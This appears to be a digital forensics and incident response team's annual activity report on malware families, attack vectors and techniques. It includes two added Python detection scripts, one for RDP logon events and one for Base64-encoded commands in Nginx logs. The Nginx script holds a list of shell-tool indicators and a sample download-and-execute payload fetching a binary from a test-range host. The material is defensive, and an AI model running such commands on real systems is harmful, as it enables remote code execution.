Overview of Activities
Throughout the year, the DFIR team and laboratory focused on incident investigations, malware
analysis, forensic examinations, and mitigation strategies for various cyber threats. Key activities
included:
1. Hard Drive and System Investigations: Analysis of damaged partitions, recovery of
potentially relevant artifacts, and detection of manipulated storage conditions.
2. Network Logs and Malicious Commands: Identification of encoded and decoded
malicious commands, tracing of command-and-control (C2) servers, and reverse shell
activities.
3. Mobile Forensics: Examination of malicious APK files, detection of Trojans and
vulnerabilities, and investigation of suspicious network activities.
4. Crypto Mining Investigations: Detection of unauthorized crypto mining operations on
recovered devices.
5. Malware Family Identification: Uncovering ransomware, Trojans, and viruses affecting
various platforms.
Techniques Implemented
The teams utilized an array of forensic and analytical techniques to uncover evidence and
mitigate risks, including:
● Image Acquisition and Disk Analysis: Recovery of data using imaging tools and analysis of
corrupted storage.
● Static and Dynamic Malware Analysis: Decompilation of APKs, Base64 decoding, and
reverse engineering of malicious binaries.
● System Log Analysis: Examination of system event logs to identify unauthorized access
and malicious activities (e.g., RDP session monitoring, logon/logoff events).
● Network Traffic Monitoring: Capture of malicious network connections and mapping of IP
addresses associated with malware.
● Artifact Recovery: Extraction of deleted files, including critical artifacts like ransom notes
and malware executables.
● Command Decoding: Decoding of encoded commands found in network logs to reveal
attacker objectives.
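As an added example (not part of the report, and not the team's own tooling), the following Python script shows how the RDP session monitoring mentioned under System Log Analysis can be carried out over exported Windows Security events. It pairs logon events (Event ID 4624 with logon type 10, RemoteInteractive) with logoff events (Event ID 4634) by LogonId, then flags sessions that come from outside an assumed management network, start outside business hours, or have no recorded logoff. The event records, the 10.0. management prefix and the 08:00-18:00 window are constructed assumptions.

```python
from dataclasses import dataclass
from datetime import datetime
from typing import Dict, List, Optional, Tuple

# Windows Security log values used here (real values):
#   4624 = successful logon; LogonType 10 = RemoteInteractive (RDP)
#   4634 = logoff
EVT_LOGON = 4624
EVT_LOGOFF = 4634
RDP_LOGON_TYPE = 10


@dataclass
class Session:
    user: str
    source_ip: str
    logon_id: str
    start: datetime
    end: Optional[datetime] = None


def reconstruct_rdp_sessions(events: List[Dict]) -> List[Session]:
    """Pair each RDP logon with its logoff by LogonId; unmatched logons stay open."""
    open_sessions: Dict[str, Session] = {}
    closed: List[Session] = []
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["id"] == EVT_LOGON and ev.get("logon_type") == RDP_LOGON_TYPE:
            open_sessions[ev["logon_id"]] = Session(
                ev["user"], ev.get("source_ip", "-"), ev["logon_id"], ev["time"]
            )
        elif ev["id"] == EVT_LOGOFF and ev["logon_id"] in open_sessions:
            s = open_sessions.pop(ev["logon_id"])
            s.end = ev["time"]
            closed.append(s)
    return closed + list(open_sessions.values())


def flag_sessions(
    sessions: List[Session],
    allowed_prefix: str = "10.0.",          # assumed management network
    business_hours: Tuple[int, int] = (8, 18),
) -> List[Tuple[Session, List[str]]]:
    """Return (session, reasons) for every session that violates a policy check."""
    findings = []
    for s in sessions:
        reasons = []
        if not s.source_ip.startswith(allowed_prefix):
            reasons.append("source outside management network")
        if not business_hours[0] <= s.start.hour < business_hours[1]:
            reasons.append("logon outside business hours")
        if s.end is None:
            reasons.append("no matching logoff recorded")
        if reasons:
            findings.append((s, reasons))
    return findings


def ts(s: str) -> datetime:
    return datetime.fromisoformat(s)


# Constructed sample events (not real log data). Field names are a simplified
# view of the 4624/4634 event XML; a real exporter would map EventData fields.
SAMPLE_EVENTS = [
    {"time": ts("2024-03-12T09:02:11"), "id": 4624, "logon_type": 10,
     "user": "jdoe", "logon_id": "0x3E7A1", "source_ip": "10.0.5.14"},
    {"time": ts("2024-03-12T09:45:00"), "id": 4634, "logon_id": "0x3E7A1"},
    {"time": ts("2024-03-12T02:13:47"), "id": 4624, "logon_type": 10,
     "user": "svc_backup", "logon_id": "0x51C22", "source_ip": "203.0.113.77"},
    # Network logon (type 3), not RDP: must be ignored by the reconstruction.
    {"time": ts("2024-03-12T10:10:05"), "id": 4624, "logon_type": 3,
     "user": "jdoe", "logon_id": "0x6001B", "source_ip": "10.0.5.14"},
]

if __name__ == "__main__":
    for session, reasons in flag_sessions(reconstruct_rdp_sessions(SAMPLE_EVENTS)):
        print(session.user, session.source_ip, session.start, "->", session.end)
        for r in reasons:
            print("   ", r)
```

The reconstruction keys on LogonId rather than on user name because one account can hold several concurrent sessions; a session that never receives a 4634 is reported rather than silently dropped, since a missing logoff is itself worth a look during an investigation.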
Cyber Attack Vectors Identified
The investigations revealed the following common attack vectors:
1. Remote Code Execution (RCE): Achieved through encoded commands, evidenced in web
server (e.g., Nginx) access logs.
2. Ransomware Deployment: Identified through LockBit ransomware activities, leaving
ransom notes and encrypted data.
3. Crypto Mining Malware: Exploitation of system resources for unauthorized cryptocurrency
mining.
4. Trojan Horses: Deployment of disguised malicious software to exfiltrate sensitive data or
gain remote access.
5. Social Engineering: Utilization of malicious APKs mimicking legitimate applications to gain
device access.
6. Supply Chain Attacks: Infected updates and compromised software installations identified
in some systems.
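The Command Decoding technique and the RCE vector above both come down to the same defensive check: find Base64-looking tokens in web server request lines, decode them, and decide whether the result is application data or a command. The following Python script is an added example (not the report's or the team's own code) that does this over Nginx access log lines in the common "combined" format; the log format, the indicator list and the sample lines (with TEST-NET addresses) are constructed assumptions.

```python
import base64
import re
import urllib.parse
from typing import Dict, List

# Nginx "combined" access log layout (assumed; adjust if the log_format differs).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)

# Runs of the Base64 alphabet long enough to be worth decoding, with optional padding.
B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")

# Substrings that, inside a decoded request parameter, indicate command execution
# rather than ordinary application data. Defensive indicators; not exhaustive.
SHELL_INDICATORS = ("/bin/sh", "bash ", "wget ", "curl ", "chmod +x", "/dev/tcp/", "nc ")


def decode_candidates(text: str) -> List[str]:
    """Decode every Base64-looking token in text; keep only readable results."""
    results = []
    for tok in B64_RE.findall(text):
        padded = tok + "=" * (-len(tok) % 4)  # restore padding the client may have stripped
        try:
            raw = base64.b64decode(padded, validate=True)
            decoded = raw.decode("utf-8")
        except ValueError:  # binascii.Error and UnicodeDecodeError are both ValueErrors
            continue
        if all(c.isprintable() or c in "\r\n\t" for c in decoded):
            results.append(decoded)
    return results


def analyze_line(line: str) -> Dict:
    """Parse one access log line and report decoded parameters that look like commands."""
    m = LOG_RE.match(line)
    if not m:
        return {"parsed": False, "suspicious": False, "line": line}
    uri = urllib.parse.unquote(m.group("uri"))  # %-decode so '=' padding and '+' survive
    decoded = decode_candidates(uri)
    commands = [d for d in decoded if any(ind in d for ind in SHELL_INDICATORS)]
    return {
        "parsed": True,
        "ip": m.group("ip"),
        "time": m.group("time"),
        "uri": uri,
        "decoded": decoded,
        "commands": commands,
        "suspicious": bool(commands),
    }


def scan(lines: List[str]) -> List[Dict]:
    """Return only the records flagged as suspicious, in log order."""
    return [r for r in map(analyze_line, lines) if r["suspicious"]]


def _b64(s: str) -> str:
    return base64.b64encode(s.encode()).decode()


# Constructed sample log lines (not real traffic); addresses are from the
# documentation (TEST-NET) ranges. The second line carries a harmless encoded
# token, the third a Base64-encoded download-and-execute command.
SAMPLE_LOG = [
    '198.51.100.23 - - [12/Mar/2024:10:14:02 +0000] "GET /index.html HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [12/Mar/2024:10:14:05 +0000] "GET /api/v1/profile?token='
    + _b64("session-id-7f3a-user-42")
    + ' HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
    '203.0.113.45 - - [12/Mar/2024:10:15:31 +0000] "GET /cgi-bin/status?cmd='
    + _b64("wget http://203.0.113.5/u.bin -O /tmp/u; chmod +x /tmp/u; /tmp/u")
    + ' HTTP/1.1" 500 0 "-" "curl/7.68.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f'{hit["time"]} {hit["ip"]} {hit["uri"]}')
        for cmd in hit["commands"]:
            print("    decoded command:", cmd)
```

Decoding every long token rather than only known parameter names keeps the check independent of the application; the printable-text filter discards binary false positives (compressed blobs, signed tokens), and the indicator match then separates ordinary opaque identifiers from shell commands, which is the distinction an analyst makes by hand when decoding commands from logs.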
Malware Types and Families Identified
1. LockBit Ransomware: Known for encrypting files beyond recovery and leaving ransom
demands.
2. Win32/Neshta.A: File-infecting virus targeting executables.
3. Trojan Families:
○ Trojan/Canesspy: Found in malicious APKs targeting Android users.
○ Trojan/Jadaneck: JavaScript-based Trojans for browser session hijacking and data
theft.
○ Trojan/Wacatac.H!ml: Facilitating remote access and additional malware
downloads.
4. Mobile Trojans: Exploited APKs to exfiltrate data.
5. Custom Malware: A custom binary used for reverse shells and system control.
Key Findings
● Attackers leveraged outdated system configurations and weak access controls.
● Malicious files were frequently disguised as legitimate executables.
● Several instances of crypto mining operations were detected and linked to compromised
system files.
● APKs requesting excessive permissions contributed to significant data breaches.
Conclusion
The DFIR teams successfully identified and mitigated a range of cyber threats. By deploying
advanced forensic techniques and maintaining vigilance over emerging attack vectors, they
safeguarded critical systems and provided actionable recommendations to strengthen cyber
defenses moving forward.